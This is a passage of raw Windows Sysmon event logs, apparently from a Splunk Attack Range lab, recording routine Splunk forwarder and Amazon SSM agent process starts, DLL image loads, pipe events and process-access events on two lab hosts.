10341000x800000000000000057344716Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344715Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057344714Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057344713Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057344712Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x800000000000000057344711Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-8868-6164-0500-00000000F101}424440C:\Windows\system32\csrss.exe{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057344710Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.488{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057344709Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.473{8B6011A9-5B08-618E-39F3-04000000F101}9192C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057344708Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:08.473{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344707Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:08.473{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344706Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:08.473{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344705Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:08.473{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057344704Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:08.473{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057344703Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:16:08.473{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000057344702Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.292{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\respondent-20211011185456-44545MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63Bfalsetrue 11241100x800000000000000057344701Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.291{8B6011A9-887F-6164-4300-00000000F101}3568C:\Program Files\Amazon\SSM\ssm-agent-worker.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\respondent-20211011185456-445452021-11-12 12:16:08.291 11241100x800000000000000057344700Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.289{8B6011A9-887D-6164-2C00-00000000F101}2924C:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0babd73079828ea96\channels\health\tmp\surveyor-20211011185454-445462021-11-12 12:16:08.289 534500x800000000000000057344699Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.010{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe 10341000x800000000000000057344698Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.010{8B6011A9-5B07-618E-38F3-04000000F101}101649436C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057344697Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.010{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057344696Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:08.010{8B6011A9-5B07-618E-38F3-04000000F101}10164C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 10341000x800000000000000021219389Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.304{AD5E2759-54C7-6143-AA00-00000000F101}35682904C:\Windows\system32\conhost.exe{AD5E2759-5B08-618E-02CE-08000000F101}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219388Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.289{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219387Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.289{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219386Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.289{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219385Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.289{AD5E2759-5433-6143-0C00-00000000F101}7325636C:\Windows\system32\svchost.exe{AD5E2759-5434-6143-1F00-00000000F101}1140C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021219384Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.289{AD5E2759-5432-6143-0500-00000000F101}4122832C:\Windows\system32\csrss.exe{AD5E2759-5B08-618E-02CE-08000000F101}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021219383Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.289{AD5E2759-54C7-6143-A600-00000000F101}4072516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{AD5E2759-5B08-618E-02CE-08000000F101}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021219382Microsoft-Windows-Sysmon/Operationalwin-host-874.attackrange.local-2021-11-12 12:16:08.274{AD5E2759-5B08-618E-02CE-08000000F101}4476C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{AD5E2759-5432-6143-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{AD5E2759-54C7-6143-A600-00000000F101}4072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 734700x800000000000000057344879Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.807{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057344878Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.806{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057344877Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.806{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057344876Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.805{8B6011A9-5B09-618E-3BF3-04000000F101}9232\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057344875Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.805{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x800000000000000057344874Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:16:09.804{8B6011A9-5B09-618E-3BF3-04000000F101}9232\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe 734700x800000000000000057344873Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.804{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 734700x800000000000000057344872Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.803{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057344871Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057344870Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057344869Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057344868Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057344867Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057344866Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057344865Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057344864Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057344863Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057344862Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:16:09.788{8B6011A9-5B09-618E-3BF3-04000000F101}9232C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft 